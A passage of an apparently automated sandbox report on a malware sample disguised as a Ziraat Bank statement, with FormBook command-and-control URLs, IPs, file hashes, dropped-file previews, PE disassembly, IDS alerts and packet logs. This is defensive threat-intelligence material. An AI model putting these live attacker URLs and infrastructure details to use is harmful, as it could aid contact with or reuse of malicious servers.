                                                  • www.iceboring.com/fuyb/?4hLpo=FBZdp6&jL0=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==
                                                  3ieckSO4EL.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/fuyb/?4hDtov1=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==&a2MTP4=yHAl2XfPqvFt4j
                                                  FedEX.exeGet hashmaliciousBrowse
                                                  • www.sbrco.net/cour/?a8_DM4yx=5K4yHsJ9E8OCo4lpPX/pgOMJL6h904cpHq/DKl+JExs5qHkrFnD9qnICzmg14sLIDD0twRyxTlpGUGv45uAz9uCNeenKauztFA==&FFN0=2dRlFh_p
                                                  kopia p#U0142atno#U015bci.exeGet hashmaliciousBrowse
                                                  • www.t4yfrance.com/dwdp/?Ploxn=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==&b2Mt=Q4SXxN_hK
                                                  44620.exeGet hashmaliciousBrowse
                                                  • www.t4yfrance.com/dwdp/?y8=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRJIm9xNUft4g0EErls9LM3FR8X&yDKTI=PXyxUJshCVDXBZtP
                                                  0m1W0nDBF5.imgGet hashmaliciousBrowse
                                                  • www.t4yfrance.com/dwdp/?5jk=U2Jpt&7nrhV=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==
                                                  AnOqqu1435.imgGet hashmaliciousBrowse
                                                  • www.t4yfrance.com/dwdp/?DR-P=VXa0gzFpvDy&-Zn=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQ25tTkvl4SQxCA==
                                                  PO#160942.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/fuyb/?RnKPtJ=wqXCX8OhtvSlHAZwOfBWnOfZ/R2p/G6DdWl1tzf/7jxUDzpEBU+k0liEEKvagZgTd6jKHbMDh7HhDdjpxPwCk2HXZOkxzIbj4g==&5jU=h4zTzf
                                                  payment receipt.exeGet hashmaliciousBrowse
                                                  • www.sbrco.net/cour/?w0DLPNd=5K4yHsJ9E8OCo4lpPX/pgOMJL6h904cpHq/DKl+JExs5qHkrFnD9qnICzmg14sLIDD0twRyxTlpGUGv45uAz9uCNeenKauztFA==&9rFHcZ=3fudcX1
                                                  Musterkatalog 2022.pdf.exeGet hashmaliciousBrowse
                                                  • www.t4yfrance.com/dwdp/?fZz=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA==&-Zl=7nH43
                                                  DHL.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/g9h5/?oTpPI=1jf9zeAvs41zCh8SSS2/De5IZF902BZt+/vEbLyEdQXtzdKTSEjKWHrOV238UKf8abGLUgSoX05gZfCEiP+oY5hql/S+MLYT7A==&b4apMd=E8AdZ49
                                                  Feoml1f5Wl.exeGet hashmaliciousBrowse
                                                  • www.collegeecho.com/qkwl/?7nJP=fZI8X8G&-ZQ=swUCXOjQ6flrn6vf1rN3cR1f3sq5iWUGV0WhoCPhy5qKCM6fjT8+uRSapqHlu0mAfwX9OH8Nx9Z3ZHwnfNyN/3MxwbrzkSRVDQ==
                                                  payment receipt.exeGet hashmaliciousBrowse
                                                  • www.iceboring.com/g9h5/?oR-P=3fIlKjVPwje&f8FPabq=1jf9zeAvs41zCh8SSS2/De5IZF902BZt+/vEbLyEdQXtzdKTSEjKWHrOV238UKf8abGLUgSoX05gZfCEiP+oY5hql/S+MLYT7A==

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  www.genuineinsights.cloudcaptain.exeGet hashmaliciousBrowse
                                                  • 66.96.162.149
                                                  file.exeGet hashmaliciousBrowse
                                                  • 66.96.162.149
                                                  0900664 MOHS Tender..jsGet hashmaliciousBrowse
                                                  • 66.96.162.149

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  https://botimetpolis.al/amazing/cnsm@condenast.comGet hashmaliciousBrowse
                                                  • 104.21.61.102
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  322pVOVprx.exeGet hashmaliciousBrowse
                                                  • 162.159.128.233
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  33040117281.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  https://banquea.ruGet hashmaliciousBrowse
                                                  • 188.114.97.3
                                                  file.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  HSBC Payment Advice.com.exeGet hashmaliciousBrowse
                                                  • 188.114.96.3
                                                  Remmitance copy.shtml.htmlGet hashmaliciousBrowse
                                                  • 104.18.11.207
                                                  https://netorgft4757675-my.sharepoint.com/:o:/g/personal/nino_vervestaffing_com/EuVkRbAPDwZFrFzhzCB__pIBBRD_SZK6hPoC3ZhgkcgmFg?e=5%3adVoGdo&at=9Get hashmaliciousBrowse
                                                  • 104.17.25.14

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\-912K03JO

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\cmmon32.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):94208
                                                  Entropy (8bit):1.287139506398081
                                                  Encrypted:false
                                                  SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                  MD5:292F98D765C8712910776C89ADDE2311
                                                  SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                  SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                  SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\nsvBFE8.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296619
                                                  Entropy (8bit):7.711319758135522
                                                  Encrypted:false
                                                  SSDEEP:6144:INSTGtcSPxGW+AbioJxuQgfXv+a48Tt+cH3bYlMMtuhc:I0GekMjAbionuxv+a4hcLYlMMtuhc
                                                  MD5:FD7B23533E54A4963AA52A71DF695434
                                                  SHA1:49B5F8E99833C0FD3ECC967B670F83CD7638E45D
                                                  SHA-256:9E853745A7F05F15F7F6F0005E02681072EB881B57AF7A4DD7C64CF53D884377
                                                  SHA-512:2150458828F0FA2945C09035EF26B05ED0AAC841708A94D4F4B10D609FB14889340098098BD3F6FFF429645C779502D058B5F5409F383028286BD91097B5D01E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:,!......,...................^...........N .......!..............................................................................*...........................................................................................................................................................G...................j...............................................................................................................................S...........F...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tkssmkx.kl

                                                  Download File
                                                  Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):210445
                                                  Entropy (8bit):7.998802869873856
                                                  Encrypted:true
                                                  SSDEEP:6144:iNSTGtcSPxGW+AbioJxuQgfXv+a48Tt+cH3h:i0GekMjAbionuxv+a4hcR
                                                  MD5:017FE57C1EAC68FAFB7C8ADB013C22A0
                                                  SHA1:14D2D4D4CF948FAF0D0CE0F4DF1B358ABD8FAAFE
                                                  SHA-256:DDA140EDDF73C49AC67A2F5068C03A04E15489CC34DA1E1955C6E7F5EFB6BAA3
                                                  SHA-512:2857D31BBCEA0A6420BA9FD0501D71F7AC719770291D2C289FDCD4615CEF54B11E116374AEC40F0A51F5FEC64DE8AFC5487621781B5C74423F9B487CB975A8F0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:..GQ{.km...M..e3E....W2...d.w.#.Ry.:...].mM.?%..Os .E.+j....k...Z..Rc.;67N..8....r..i=..@....T.o-..z0.n.h...x...V@....R..~]..24.".0%..Je?(Q....A.z..&.ESB.PJ..{K.u.G....e.....,P..s..YX..}.x.B...f...s...g+M.I..%...&Z.....p.:.~B...t..k...d...)-..x..;..km...5........G<....mP5.Rye:.}.].m].?...Os .:.+j....k...b.'R....8b..-C..$s.P...._.BD......4.x..i.'.s.q..wG.a....R..~].D..i......6..>&?.m..m.k..z5C..jp..O...pmK-e.....,P..D.YX...txo%..+3.....s...g.M}x.[......Z.....p...~B;..t..k..td...)X....;..km...5......o...G<.....P#.Ry.:...].mM.?%..Os .E.+j....k...b.'R....8b..-C..$s.P...._.BD......4.x..i.'.s.q..wG.a....R..~].D..i......6..>&?.m..m.k..z5C..jp..O...pmK-e.....,P..s..YX....xo..+.....s...g.M}x.[....&Z.....p...~B;..t..k..td...)X....;..km...5......o...G<.....P#.Ry.:...].mM.?%..Os .E.+j....k...b.'R....8b..-C..$s.P...._.BD......4.x..i.'.s.q..wG.a....R..~].D..i......6..>&?.m..m.k..z5C..jp..O...pmK-e.....,P..s..YX....xo..+.....s...g.M}x.[....&Z.....p

                                                  C:\Users\user\AppData\Local\Temp\tqxwmam.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):71680
                                                  Entropy (8bit):6.274970085685781
                                                  Encrypted:false
                                                  SSDEEP:1536:EFIUn3hHFeTNX55DMRWhZYLL4rnG7lQoPGbxzbIhX:UIU9FIha/4ei8
                                                  MD5:B3C569394E804A6C34E9677DACE79A23
                                                  SHA1:5290E495798E598C49F8F6F37039EFCAB81BF869
                                                  SHA-256:46774FADD3AFD1DA3A577A2AB6F7BE891496CB3D970FCE7D4BA2E2EA88345A64
                                                  SHA-512:F8250E3886BFCD050FD93711DD8DD47747D2B4F44239C1A8C90B1D320779BBA3AF01B4D536F0B6E8005B69BE964630D3BC24644807D70B495447A2901FB69EC8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.re...6...6...6w.68..6w.6...6..6...6...6..6w.6c..6w.6...6Rich...6................PE..L......c.....................x....................@..........................p..............................................$...@.......................................................................................p............................text............................... ..`.rdata...1.......2..................@..@.data....D... ......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\wjybinpf.dj

                                                  Download File
                                                  Process:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5986
                                                  Entropy (8bit):7.142402427131204
                                                  Encrypted:false
                                                  SSDEEP:96:Farc6oYMUg/DrYuWMzk2XO5oSwY5aE1VFd4mqC4YpR8wdvEtPdPdCASpHnU15FgA:FarcRdXhX1S95RfFqjuKovwlC7HnU15D
                                                  MD5:F23AD3446BD4A8EF623D6A466E802D2B
                                                  SHA1:810741293A63D20ABCC99A9F783992B564ED8FFF
                                                  SHA-256:715F321B78EB36EFFF360DEB628A4234F25AE04FEF40258EDA08869ACC035617
                                                  SHA-512:644A7F8C907950202EB87970D5BAA5190057BAAE9DF99988DA098F48F55665875315D422C2A183B41E8638E1A9C825A304AE3DA4433E1437A00B57CB69ABCCE9
                                                  Malicious:false
                                                  Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Entropy (8bit):7.921394492264075
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                  File size:286787
                                                  MD5:9d0b109dd6efb4a954ff88d024034d3a
                                                  SHA1:13b2c7e70fbf0027584783910e61222e7cacae58
                                                  SHA256:f3197cca74f60c552d9d3b4d04d99996ceca8c8dc6ad845a468c10c65062a0fc
                                                  SHA512:1942fb7654bc7cb19366ff3a98b522480a2b755eebd69d9ff864b9ca946e1d73ee386ad9184373517bc51c68c40fac28c5d69d7124b488a6ef1a68d6558acbda
                                                  SSDEEP:6144:/Ya6Y4oiwtoVxuTwRsDNwrLU0QQDYFKwCyGARrUmHsH6X7lfR4:/Ye4QQ4wCZwrg0QQsSpM9sH6X7l54
                                                  TLSH:4D5412057DB8C057E5B09B322F341AC5ADACBA2B5EB4478F5360A71CBE19394D90D3A3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                  File Icon

                                                  Icon Hash:b2a88c96b2ca6a72

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x403640
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:61259b55b8912888e90f516ca08dc514

                                                  Entrypoint Preview

                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 000003F4h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  push 00000020h
                                                  pop edi
                                                  xor ebx, ebx
                                                  push 00008001h
                                                  mov dword ptr [ebp-14h], ebx
                                                  mov dword ptr [ebp-04h], 0040A230h
                                                  mov dword ptr [ebp-10h], ebx
                                                  call dword ptr [004080C8h]
                                                  mov esi, dword ptr [004080CCh]
                                                  lea eax, dword ptr [ebp-00000140h]
                                                  push eax
                                                  mov dword ptr [ebp-0000012Ch], ebx
                                                  mov dword ptr [ebp-2Ch], ebx
                                                  mov dword ptr [ebp-28h], ebx
                                                  mov dword ptr [ebp-00000140h], 0000011Ch
                                                  call esi
                                                  test eax, eax
                                                  jne 00007FF08463D0BAh
                                                  lea eax, dword ptr [ebp-00000140h]
                                                  mov dword ptr [ebp-00000140h], 00000114h
                                                  push eax
                                                  call esi
                                                  mov ax, word ptr [ebp-0000012Ch]
                                                  mov ecx, dword ptr [ebp-00000112h]
                                                  sub ax, 00000053h
                                                  add ecx, FFFFFFD0h
                                                  neg ax
                                                  sbb eax, eax
                                                  mov byte ptr [ebp-26h], 00000004h
                                                  not eax
                                                  and eax, ecx
                                                  mov word ptr [ebp-2Ch], ax
                                                  cmp dword ptr [ebp-0000013Ch], 0Ah
                                                  jnc 00007FF08463D08Ah
                                                  and word ptr [ebp-00000132h], 0000h
                                                  mov eax, dword ptr [ebp-00000134h]
                                                  movzx ecx, byte ptr [ebp-00000138h]
                                                  mov dword ptr [0042A318h], eax
                                                  xor eax, eax
                                                  mov ah, byte ptr [ebp-0000013Ch]
                                                  movzx eax, ax
                                                  or eax, ecx
                                                  xor ecx, ecx
                                                  mov ch, byte ptr [ebp-2Ch]
                                                  movzx ecx, cx
                                                  shl eax, 10h
                                                  or eax, ecx

                                                  Rich Headers

                                                  Programming Language:
                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000xcf0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x3b0000xcf00xe00False0.42550223214285715data4.238588529536744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountry
                                                  RT_ICON0x3b1d80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                                  RT_DIALOG0x3b4c00x100dataEnglishUnited States
                                                  RT_DIALOG0x3b5c00x11cdataEnglishUnited States
                                                  RT_DIALOG0x3b6e00x60dataEnglishUnited States
                                                  RT_GROUP_ICON0x3b7400x14dataEnglishUnited States
                                                  RT_VERSION0x3b7580x254dataEnglishUnited States
                                                  RT_MANIFEST0x3b9b00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                  Imports

                                                  DLLImport
                                                  ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                  SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                  COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                  USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                  GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                  KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  192.168.2.58.8.8.861893532023883 02/14/23-08:22:30.544280UDP2023883ET DNS Query to a *.top domain - Likely Hostile6189353192.168.2.58.8.8.8
                                                  192.168.2.566.160.197.7649714802031453 02/14/23-08:23:51.479305TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.566.160.197.76
                                                  192.168.2.566.160.197.7649714802031449 02/14/23-08:23:51.479305TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.566.160.197.76
                                                  192.168.2.566.160.197.7649714802031412 02/14/23-08:23:51.479305TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.566.160.197.76

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 14, 2023 08:22:30.587356091 CET4970080192.168.2.5107.148.8.96
                                                  Feb 14, 2023 08:22:30.794362068 CET8049700107.148.8.96192.168.2.5
                                                  Feb 14, 2023 08:22:30.794580936 CET4970080192.168.2.5107.148.8.96
                                                  Feb 14, 2023 08:22:30.794945955 CET4970080192.168.2.5107.148.8.96
                                                  Feb 14, 2023 08:22:31.001847982 CET8049700107.148.8.96192.168.2.5
                                                  Feb 14, 2023 08:22:31.001935005 CET8049700107.148.8.96192.168.2.5
                                                  Feb 14, 2023 08:22:31.001971006 CET8049700107.148.8.96192.168.2.5
                                                  Feb 14, 2023 08:22:31.002245903 CET4970080192.168.2.5107.148.8.96
                                                  Feb 14, 2023 08:22:31.002418041 CET4970080192.168.2.5107.148.8.96
                                                  Feb 14, 2023 08:22:31.209084034 CET8049700107.148.8.96192.168.2.5
                                                  Feb 14, 2023 08:22:41.093477011 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:22:44.094819069 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:22:50.110874891 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:03.208956003 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:06.221494913 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:12.222038031 CET4970180192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:26.511262894 CET4970780192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:29.520384073 CET4970780192.168.2.5194.102.227.30
                                                  Feb 14, 2023 08:23:32.314115047 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:32.490658045 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.490853071 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:32.497952938 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:32.674602985 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762336969 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762403011 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762459993 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762543917 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762584925 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762589931 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:32.762631893 CET8049709184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:32.762658119 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:32.762746096 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:34.005218983 CET4970980192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.027262926 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.209275961 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.209481955 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.209734917 CET4971080192.168.2.5184.94.215.91
                                                  Feb 14, 2023 08:23:35.388986111 CET8049710184.94.215.91192.168.2.5
                                                  Feb 14, 2023 08:23:35.521591902 CET4970780192.168.2.5194.102.227.30
